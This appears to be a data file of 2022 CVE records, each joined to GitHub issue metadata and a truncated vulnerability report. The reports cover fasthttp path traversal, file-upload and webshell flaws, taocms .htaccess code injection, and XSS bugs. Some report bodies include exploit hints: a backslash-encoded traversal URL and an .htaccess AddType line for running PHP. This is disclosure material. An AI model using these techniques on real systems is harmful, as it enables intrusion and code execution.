2021-12-22T14:29:35Z
2022-12-23T03:51:13Z
https://github.com/slims/slims9_bulian/issues/124
1,086,875,971
124
3,369
CVE-2022-0749
2022-03-17T12:15:07.970
This affects all versions of package SinGooCMS.Utility. The socket client in the package can pass in the payload via the user-controllable input after it has been established, because this socket client transmission does not have the appropriate restrictions or type bindings for the BinaryFormatter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/SinGooCMS/SinGooCMSUtility/blob/master/SinGooCMS.Utility/Net/SocketClient.cs" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Issue Tracking", "Thi...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:singoo:singoocms.utility:-:*:*:*:*:*:*:*", "matchCriteriaId": "83FCBCF4-33D1-4367-946B-2C2DB1152C76", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartE...
[ "502" ]
502
https://github.com/SinGooCMS/SinGooCMSUtility/issues/1
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "SinGooCMS", "SinGooCMSUtility" ]
### Risk Class:SinGooCMSUtility/SinGooCMS.Utility/Net/SocketClient.cs ![image](https://user-images.githubusercontent.com/55079235/145212639-50a55558-044a-49c4-8cbf-077f938a6ae6.png) #### Set up socket communication server : ![image](https://user-images.githubusercontent.com/55079235/145215068-2e9d8530-78b7-4aef-a...
Vulnerability Report: BinaryFormatter security vulnerability
https://api.github.com/repos/SinGooCMS/SinGooCMSUtility/issues/1/comments
1
2021-12-08T13:29:42Z
2021-12-08T13:47:31Z
https://github.com/SinGooCMS/SinGooCMSUtility/issues/1
1,074,413,488
1
3,370
CVE-2022-21221
2022-03-17T12:15:08.087
The package github.com/valyala/fasthttp before 1.34.0 are vulnerable to Directory Traversal via the ServeFile function, due to improper sanitization. It is possible to be exploited by using a backslash %5c character in the path. **Note:** This security issue impacts Windows users only.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", ...
[ { "source": "report@snyk.io", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/valyala/fasthttp/commit/15262ecf3c602364639d465daba1e7f3604d00e8" }, { "source": "report@snyk.io", "tags": [ "Patch", "Third Party Advisory" ], "url": "ht...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fasthttp_project:fasthttp:*:*:*:*:*:*:*:*", "matchCriteriaId": "B292937C-1EF2-4FD3-B714-90714DEC82E1", "versionEndExcluding": "1.34.0", "versionEndIncluding": null, "versionS...
[ "22" ]
22
https://github.com/valyala/fasthttp/issues/1226
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "valyala", "fasthttp" ]
Hello, I found a problem when requesting - path traversal attacks (https://localhost/..%5clogs/app.log). If you specify a backslash (%5c) character in the path, then you can follow the path /../ and get data from the root. It may be worth adding a check for part of the path - /..\. strSlashDotDotBackSlash = []byte("/.....
Path Traversal Attacks
https://api.github.com/repos/valyala/fasthttp/issues/1226/comments
7
2022-02-21T11:25:44Z
2024-01-09T08:13:57Z
https://github.com/valyala/fasthttp/issues/1226
1,145,672,097
1,226
3,371
CVE-2021-45834
2022-03-18T11:15:07.917
An attacker can upload or transfer files of dangerous types to the OpenDocMan 1.4.4 portal via add.php using MIME-bypass, which may be automatically processed within the product's environment or lead to arbitrary code execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "http://opendocman.com" }, { "source": "cve@mitre.org", "tags": [ "Product", "Third Party Advisory" ], "url": "https://github.com/opendocman/opendocman" }, { "source": "cve@mitre.org", "tags"...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:opendocman:opendocman:1.4.4:-:*:*:*:*:*:*", "matchCriteriaId": "E32B307D-542F-48EC-B7AA-8D7F4CA1A7CA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStart...
[ "434" ]
434
https://github.com/opendocman/opendocman/issues/326
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "opendocman", "opendocman" ]
Hi there, I couldn't find a `SECURITY.md` in your repository and am not sure how to best contact you privately to disclose a security issue. Can you add a `SECURITY.md` file with an e-mail to your repository, so that our system can send you the vulnerability details? GitHub suggests that a [security policy](https...
Trying to get in touch regarding a security issue
https://api.github.com/repos/opendocman/opendocman/issues/326/comments
0
2021-08-02T17:49:53Z
2021-08-02T17:49:53Z
https://github.com/opendocman/opendocman/issues/326
958,374,631
326
3,372
CVE-2021-45834
2022-03-18T11:15:07.917
An attacker can upload or transfer files of dangerous types to the OpenDocMan 1.4.4 portal via add.php using MIME-bypass, which may be automatically processed within the product's environment or lead to arbitrary code execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "http://opendocman.com" }, { "source": "cve@mitre.org", "tags": [ "Product", "Third Party Advisory" ], "url": "https://github.com/opendocman/opendocman" }, { "source": "cve@mitre.org", "tags"...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:opendocman:opendocman:1.4.4:-:*:*:*:*:*:*", "matchCriteriaId": "E32B307D-542F-48EC-B7AA-8D7F4CA1A7CA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStart...
[ "434" ]
434
https://github.com/opendocman/opendocman/issues/330
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "opendocman", "opendocman" ]
**Describe the bug** Attacker can upload files with dangerous types to the OpenDocMan 1.4.4 via add.php using MIME-bypass. File is available under specific ID, which is returned in response from application. **To Reproduce** Steps to reproduce the behavior: 1. Login to the application 2. Click on "Add Document...
Security Vulnerability - Unrestricted File Upload
https://api.github.com/repos/opendocman/opendocman/issues/330/comments
0
2022-03-17T13:27:08Z
2022-03-17T13:27:08Z
https://github.com/opendocman/opendocman/issues/330
1,172,387,431
330
3,373
CVE-2021-45835
2022-03-18T11:15:07.967
The Online Admission System 1.0 allows an unauthenticated attacker to upload or transfer files of dangerous types to the application through documents.php, which may be used to execute malicious code or lead to code execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/rskoolrash/Online-Admission-System" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/rskoolrash/Online-Adm...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:online_admission_system_project:online_admissions_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "FADE83E7-D06C-446D-9B6F-BAD2F81939AF", "versionEndExcluding": null, "versionEndIncluding"...
[ "434" ]
434
https://github.com/rskoolrash/Online-Admission-System/issues/2
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "rskoolrash", "Online-Admission-System" ]
Hello, I'm trying to reach you regarding security vulnerability I have found in your application. Can you add a `SECURITY.md` file with an e-mail to your repository, so that our system can send you the vulnerability details? GitHub suggests that a security policy is the best way to make sure security issues are re...
Security Vulnerability
https://api.github.com/repos/rskoolrash/Online-Admission-System/issues/2/comments
1
2021-12-23T12:27:37Z
2022-03-17T12:56:13Z
https://github.com/rskoolrash/Online-Admission-System/issues/2
1,087,673,026
2
3,374
CVE-2022-25578
2022-03-18T23:15:07.710
taocms v3.0.2 allows attackers to execute code injection via arbitrarily editing the .htaccess file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Product", "URL Repurposed" ], "url": "http://taocms.com" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/taogogo/taocms/issues/28" }...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:taogogo:taocms:3.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "AA84748C-B58B-4A72-A527-7FF567BACCC2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludi...
[ "94" ]
94
https://github.com/taogogo/taocms/issues/28
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "taogogo", "taocms" ]
We click on file management to go to the management location of the website and directory. ![image](https://user-images.githubusercontent.com/54017627/154784040-c571d842-3a18-49b2-a697-41858984921b.png) Click to edit the .htaccess file and add a line at the end, 'AddType application/x-httpd-php.php3', click Save....
Code injection caused by arbitrary file editing vulnerability in taocms3.0.2
https://api.github.com/repos/taogogo/taocms/issues/28/comments
0
2022-02-19T03:32:57Z
2022-02-19T03:32:57Z
https://github.com/taogogo/taocms/issues/28
1,144,266,602
28
3,375
CVE-2022-25464
2022-03-20T19:15:07.610
A stored cross-site scripting (XSS) vulnerability in the component /admin/contenttemp of DoraCMS v2.1.8 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/doramart/DoraCMS/issues/255" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third P...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:html-js:doracms:2.1.8:*:*:*:*:*:*:*", "matchCriteriaId": "1FFA2258-7C76-482B-8076-AAD87B371A21", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
[ "79" ]
79
https://github.com/doramart/DoraCMS/issues/255
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "doramart", "DoraCMS" ]
[Suggested description] There is a storage XSS vulnerability in the background / admin / contenttemp module of doracms system. The user can access index HTML and 404 HTML page number will trigger JS pop-up. [Vulnerability Type] Storage XSS vulnerability [Vendor of Product] https://github.com/doramart/DoraCMS ...
There is a stored xss vulnerability exists in DoraCMS
https://api.github.com/repos/doramart/DoraCMS/issues/255/comments
0
2022-02-19T12:51:51Z
2022-02-19T12:51:51Z
https://github.com/doramart/DoraCMS/issues/255
1,144,694,355
255
3,376
CVE-2022-26246
2022-03-20T19:15:07.660
TMS v2.28.0 was discovered to contain a cross-site scripting (XSS) vulnerability in the component /TMS/admin/setting/mail/createorupdate.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/xiweicheng/tms/issues/15" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Part...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tms_project:tms:2.28.0:*:*:*:*:*:*:*", "matchCriteriaId": "C30D9217-6E4A-47E6-8D1C-201F06981881", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclu...
[ "79" ]
79
https://github.com/xiweicheng/tms/issues/15
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "xiweicheng", "tms" ]
[Suggested description] Cross SIte Scripting (XSS) vulnerability exists in tms. The cause of the vulnerability is that the input data is not filtered in the foreground page /TMS/admin/setting/mail/ createorupdate, and the input parameters are directly passed into the setting method of AdminController and executed. ...
There is a cross site scripting vulnerability exists in tms
https://api.github.com/repos/xiweicheng/tms/issues/15/comments
1
2022-02-23T08:11:56Z
2022-03-26T13:25:44Z
https://github.com/xiweicheng/tms/issues/15
1,147,782,609
15
3,377
CVE-2022-26247
2022-03-20T19:15:07.707
TMS v2.28.0 contains an insecure permissions vulnerability via the component /TMS/admin/user/Update2. This vulnerability allows attackers to modify the administrator account and password.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/xiweicheng/tms/issues/16" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Part...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:teamwork_management_system_project:teamwork_management_system:2.28.0:*:*:*:*:*:*:*", "matchCriteriaId": "DE8ABD88-819F-4ED4-92B8-23A9A515596B", "versionEndExcluding": null, "versionEndIn...
[ "732" ]
732
https://github.com/xiweicheng/tms/issues/16
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "xiweicheng", "tms" ]
[Suggested description] There is an ultra vires vulnerability in the function of modifying personal information in TMS.The vulnerability originates from / TMS / admin / user / Update2. The administrator account and password can be modified beyond his authority by modifying the packet parameters. [Vulnerability Ty...
There is a Insecure Permissions vulnerability exists in tms
https://api.github.com/repos/xiweicheng/tms/issues/16/comments
1
2022-02-24T02:13:47Z
2022-03-26T12:59:41Z
https://github.com/xiweicheng/tms/issues/16
1,148,780,624
16
3,378
CVE-2020-26007
2022-03-20T22:15:07.683
An arbitrary file upload vulnerability in the upload payment plugin of ShopXO v1.9.0 allows attackers to execute arbitrary code via uploading a crafted PHP file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gongfuxiang/shopxo/issues/48" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:shopxo:shopxo:1.9.0:*:*:*:*:*:*:*", "matchCriteriaId": "1576D0EF-167E-45A3-AD50-88993FA51545", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludin...
[ "434" ]
434
https://github.com/gongfuxiang/shopxo/issues/48
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gongfuxiang", "shopxo" ]
When uploading payment plug-ins, attackers can bypass file verification and upload malicious php files by constructing the code of the php file in the zip compression package. Even uploading the php file without constructing the code will trigger the file containment vulnerability or upload files through competitive up...
There are some vulnerabilities in the upload payment plugin that can get webshell
https://api.github.com/repos/gongfuxiang/shopxo/issues/48/comments
0
2020-09-21T12:31:22Z
2020-09-21T13:32:59Z
https://github.com/gongfuxiang/shopxo/issues/48
705,554,690
48
3,379